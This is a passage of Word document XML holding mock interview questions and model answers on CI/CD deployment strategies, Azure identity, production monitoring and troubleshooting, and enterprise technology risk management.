        <w:t>A: A typical pipeline triggers on commit, runs linting/unit tests, builds an immutable artifact tagged with the commit SHA, scans it for vulnerabilities, and deploys it to a dev/staging environment automatically for further testing. Promotion to production happens by deploying that same artifact behind an approval gate, using progressive delivery (canary or rolling update) with automated rollback if monitoring detects a regression, closing the loop from commit to safely-verified production deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. CI/CD tools: Which CI/CD tools have you used, and where did each fit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Jenkins fits complex, highly customized pipelines with legacy integrations where a plugin exists for nearly everything; GitHub Actions fits teams already on GitHub wanting tight repo integration and simpler YAML-based workflows; GitLab CI fits similarly for GitLab-hosted repos; Cloud Build fits GCP-native pipelines with tight IAM and Artifact Registry integration. The right tool often follows where the code already lives and what the team's existing operational familiarity is, more than any single tool being objectively superior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Application deployment: How do you deploy applications to Kubernetes, GKE, Cloud Run, or VMs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For Kubernetes/GKE, deploy via a GitOps tool (ArgoCD) or `kubectl apply`/Helm applying versioned manifests; for Cloud Run, deploy a new revision via `gcloud run deploy` or Cloud Deploy with traffic splitting for gradual rollout; for VMs, use a managed instance group with a new instance template (rolling update) rather than mutating running VMs in place. In all cases, the goal is an immutable, versioned artifact promoted through environments with a clear rollback path, not manual per-server changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Blue-green deployment: Explain blue-green deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Blue-green deployment is a release strategy where two identical production environments are maintained:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Blue environment → current live production version</w:t>
        <w:br/>
        <w:t>* Green environment → new version to be deployed</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The new application or ML model version is deployed to the green environment while the blue environment continues serving live traffic.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Once testing and validation are successful, traffic is switched from blue to green with minimal downtime.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If any issue occurs after deployment, traffic can quickly be redirected back to the blue environment, making rollback fast and safe.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps and DevOps, blue-green deployment is commonly used to:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Minimize downtime during releases</w:t>
        <w:br/>
        <w:t>* Reduce deployment risk</w:t>
        <w:br/>
        <w:t>* Enable fast rollback</w:t>
        <w:br/>
        <w:t>* Validate new models or application versions safely</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It is usually implemented using:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Kubernetes services and ingress</w:t>
        <w:br/>
        <w:t>* Load balancers</w:t>
        <w:br/>
        <w:t>* CI/CD pipelines</w:t>
        <w:br/>
        <w:t>* Cloud traffic management tools</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Compared to canary deployment, blue-green deployment switches traffic completely between environments, while canary deployment gradually shifts traffic in phases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Canary deployment: Explain canary deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Canary deployment routes a small percentage of production traffic to a new version while the majority continues to the stable version, allowing you to observe the new version's real-world behavior (error rate, latency, business metrics) on limited exposure before gradually increasing its traffic share or rolling back quickly if problems appear - it limits blast radius compared to deploying to 100% of traffic immediately.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Deployment rollback: How do you roll back deployments?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The fastest and safest rollback is redeploying the previous known-good artifact/revision rather than trying to 'fix forward' under pressure - for Kubernetes, `kubectl rollout undo`; for Cloud Run, shifting traffic back to the previous revision; for a GitOps-managed deployment, reverting the Git commit and letting the tool reconcile. Having this be a fast, well-rehearsed, one-command operation (not a manual multi-step process) is what actually makes rollback usable during a real incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Azure IAM equivalent: What is the Azure equivalent of IAM?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Azure's equivalent of GCP IAM is Azure Role-Based Access Control (RBAC), which assigns roles (built-in or custom) to security principals (users, groups, service principals, managed identities) scoped at the management group, subscription, resource group, or individual resource level, conceptually similar to GCP IAM's hierarchy-based role bindings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Microsoft Entra ID: Explain Microsoft Entra ID and how it is used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Microsoft Entra ID (formerly Azure Active Directory) is Microsoft's cloud-based identity and access management service, providing the user/group directory and authentication (including SSO and MFA) that Azure RBAC and many third-party applications rely on - it's the identity backbone equivalent to Cloud Identity in the GCP world, plus significantly more enterprise identity federation and conditional access capability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Azure identity management: How do you manage users, groups, roles, and identities in Azure?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Users and groups are managed in Microsoft Entra ID (often synced from on-premises Active Directory via Entra Connect), and access is granted through Azure RBAC role assignments scoped appropriately in the resource hierarchy. Managed identities are used for Azure resources needing to authenticate to other Azure services without storing credentials, analogous to GCP's Workload Identity, and conditional access policies add context-aware controls (location, device compliance) on top of basic role assignment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 22 - Monitoring and Scenario Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Monitoring tools: Which monitoring tools have you used in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A typical production stack combines Prometheus and Grafana for metrics and dashboards, Cloud Logging/ELK for centralized logs, OpenTelemetry-based distributed tracing, and Cloud Monitoring for GCP-native infrastructure metrics and alerting - the specific combination depends on the environment, but the underlying principle is always correlating metrics, logs, and traces so an incident can be diagnosed from a single, connected view rather than jumping between disconnected tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Alert creation: How do you create useful alerts without creating noise?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Alert on symptoms that directly indicate user impact (error rate, latency breach, SLO burn) rather than every underlying cause, require every alert to have a clear owner and actionable runbook, and use burn-rate or trend-based thresholds rather than static values that trigger on normal variance. Periodically review which alerts fire without leading to action and remove or fix them, since that's the leading cause of alert fatigue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Production troubleshooting: How do you troubleshoot production issues end to end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Start by confirming and scoping actual user impact before diving into root cause, then work through the request path systematically (load balancer, application, dependencies, infrastructure) using metrics, logs, and traces to narrow down where the failure originates rather than guessing. Mitigate impact first (rollback, scale, failover) if a fix isn't immediately obvious, and only pursue deep root-cause analysis once user impact is under control, closing with a postmortem that turns the finding into prevention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. High CPU or memory: How do you investigate high CPU or memory usage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check whether the spike correlates with a recent deployment, traffic increase, or a specific scheduled job, and use profiling tools (py-spy, pprof, or APM tooling) to identify which code path is actually consuming the resource rather than guessing. For memory specifically, distinguish a genuine leak (steadily growing, never released) from expected high but stable usage (a large cache), since the fix differs completely between the two.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Failed production deployment: A production deployment failed. What steps would you take?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: First assess actual user impact and roll back immediately if there's any risk of ongoing harm, rather than debugging live while users are affected. Once stable, review deployment logs and the specific failure point to understand root cause, verify whether the rollback itself was clean (no partial state left behind), and only attempt to redeploy the fix after confirming the actual cause and adding whatever test or gate would have caught it beforehand.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Application inaccessible after deployment: Users cannot access the application after deployment. How would you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Check the deployment status first (did pods/instances actually become healthy, or are they crashing/pending), then work outward through the request path - service endpoints, load balancer backend health, DNS - to find where connectivity breaks. A very common cause is a health check or readiness probe misconfiguration that prevents new pods from ever being marked ready, which silently keeps them out of the Service's endpoint list even though they appear to be running.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. On-prem to GCP migration: How would you migrate an application from on-premises to GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Establish hybrid connectivity first (VPN or Interconnect), replicate data continuously rather than a one-time dump so the GCP environment stays current, and build out CI/CD, observability, and security in GCP before cutover so the new environment is production-ready from day one. Cut over gradually (a subset of traffic or a maintenance window) with the on-premises environment kept available as a rollback option until the GCP side has proven stable under real production load.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Disaster recovery: How would you implement disaster recovery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Define RTO/RPO targets from actual business impact analysis, implement backup or replication matching those targets (nightly backups for a lenient RPO, continuous replication for a near-zero one), and design failover procedures - ideally automated - for the compute and networking layers. Test the entire procedure with real drills regularly, since a plan that's only ever been reviewed on paper is not a validated disaster recovery capability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 23 - Technology Risk Lead Technical Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Technology risk framework: How would you design an enterprise technology risk management framework for cloud, applications, infrastructure, SDLC, and third-party integrations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build the framework around a consistent risk taxonomy and scoring methodology applied uniformly across domains (cloud, applications, infrastructure, SDLC, vendors), with a central risk register capturing identified risks, owners, and mitigation status regardless of which domain they originate from. Embed risk assessment checkpoints directly into existing processes (architecture review, change management, vendor onboarding) rather than as a separate parallel process, so risk identification happens naturally as part of how work already gets done.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Risk assessment: A product team is launching a new customer-facing platform on GCP/GKE. How would you assess technology risk from BRD/PRD through architecture review, build, release, and operations?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Technology Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Assess risk at each stage with different focus: at BRD/PRD, identify data sensitivity and compliance requirements early since they shape architecture; at architecture review, evaluate the design against security and reliability standards before build starts; during build, verify controls (IAM, secrets management, testing) are actually implemented as designed; at release, confirm production-readiness gates pass; and in operations, monitor that the controls remain effective over time rather than assuming a one-time review is sufficient for an evolving system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Control design: For a regulated cloud platform, define preventive, detective, and corrective controls for IAM, network exposure, CI/CD, secrets, vulnerability management, and production changes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Preventive controls stop bad outcomes before they happen - org policies blocking public IPs, required approvals in CI/CD, Binary Authorization blocking unsigned images. Detective controls identify issues that occurred - audit logging, Security Command Center findings, vulnerability scan results. Corrective controls fix identified issues - automated remediation workflows, incident response procedures, patch management SLAs. A mature program has all three layered together for each risk area, not just preventive controls alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Framework mapping: How would you map ISO 27001, NIST, COBIT, and FAIR requirements to practical cloud and DevOps controls without creating checkbox compliance?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Governance/Compliance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build a single control matrix that maps each practical technical control (Workload Identity, Binary Authorization, audit logging) to the specific requirements it satisfies across all four frameworks simultaneously, so implementing one good control gets credit everywhere it applies rather than teams implementing redundant, framework-specific checkbox controls. Focus conversations with engineering teams on the actual risk being mitigated, not the framework citation, so the controls are adopted because they're genuinely useful, not just to pass an audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Audit remediation: An external audit finds weak access reviews, missing evidence, and delayed patching. How would you create a remediation plan, owners, due dates, risk acceptance, and reporting?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Break each finding into a discrete remediation item with a named owner, a realistic due date agreed with that owner (not imposed unilaterally), and clear evidence requirements for closure so it can't be marked done without proof. For findings that genuinely can't be fixed on the audit's timeline, document formal risk acceptance signed by an appropriate risk owner rather than letting it quietly slip, and report progress to leadership on a recurring cadence so remediation stays visible and doesn't stall once audit attention moves elsewhere.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Incident risk analysis: A production incident was fixed quickly, but the same failure could repeat. How would you analyze root cause, systemic risk, control failure, and long-term mitigation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Go beyond the immediate technical trigger to ask why the system allowed that trigger to cause an outage - was there a missing control, an untested assumption, or a gap in monitoring that let it go undetected longer than it should have. Classify it as a systemic risk if the same underlying gap could produce different failure modes elsewhere, not just a repeat of this exact incident, and define long-term mitigation as a permanent guardrail (automated test, policy enforcement, architectural change) rather than a manual process that relies on someone remembering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud risk dashboard: Design a technology risk dashboard for senior leadership. What KRIs, control metrics, exceptions, trends, and escalation signals would you include?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Include key risk indicators like number of critical/high findings open beyond SLA, percentage of assets with required controls verified, and incident frequency/severity trend over time, alongside control metrics showing what's actually being enforced (patch compliance rate, access review completion rate). Surface open exceptions with their expiry dates prominently so nothing quietly becomes permanent, show trend direction (improving/worsening) rather than just point-in-time snapshots, and define clear escalation thresholds so leadership knows exactly when a metric crossing a line requires their direct involvement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Risk automation: What parts of technology risk assessment and reporting would you automate using cloud logs, CI/CD metadata, vulnerability scanners, policy-as-code, and ticketing workflows?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Risk Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Automate the data collection and initial triage - pulling vulnerability scan results, policy-as-code violations, and CI/CD deployment metadata automatically into a central risk register rather than manually compiling spreadsheets, and auto-creating tickets with SLA timers for new findings. Keep human judgment for risk scoring context, prioritization tradeoffs, and any decision involving risk acceptance, since automation is excellent at surfacing and tracking findings consistently but shouldn't be making business risk-tolerance decisions on its own.</w:t>
